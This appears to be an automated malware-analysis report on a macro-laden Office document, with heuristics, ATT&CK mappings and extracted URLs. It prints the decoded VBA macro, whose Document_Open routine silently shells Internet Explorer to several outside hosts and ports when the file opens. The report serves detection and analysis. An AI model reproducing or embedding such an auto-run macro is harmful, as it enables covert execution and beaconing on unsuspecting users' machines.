MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a VBA macro that executes the 'Document_Open' subroutine. This subroutine uses the Shell() function to launch Internet Explorer and navigate to several suspicious URLs. These URLs are likely used to download and execute second-stage payloads, indicating a downloader or droppper functionality.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www-direct.crest-approved.org?bch=ping In document text (OLE body)
- http://46.252.73.45?bch=pingIn document text (OLE body)
- http://www-direct.crest-approved.org:8080?bch=pingIn document text (OLE body)
- http://46.252.73.45:8080?bch=pingIn document text (OLE body)
- http://www-direct.crest-approved.org:53?bch=pingIn document text (OLE body)
- http://46.252.73.45:53?bch=pingIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 829 bytes |
SHA-256: f802b4ab89fb31ca0139ee575fb539029e1f1bc03a5cabeaa7eb9188735762db |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Shell ("c:\progra~1\intern~1\iexplore http://www-direct.crest-approved.org?bch=ping")
Shell ("c:\progra~1\intern~1\iexplore http://46.252.73.45?bch=ping")
Shell ("c:\progra~1\intern~1\iexplore http://www-direct.crest-approved.org:8080?bch=ping")
Shell ("c:\progra~1\intern~1\iexplore http://46.252.73.45:8080?bch=ping")
Shell ("c:\progra~1\intern~1\iexplore http://www-direct.crest-approved.org:53?bch=ping")
Shell ("c:\progra~1\intern~1\iexplore http://46.252.73.45:53?bch=ping")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.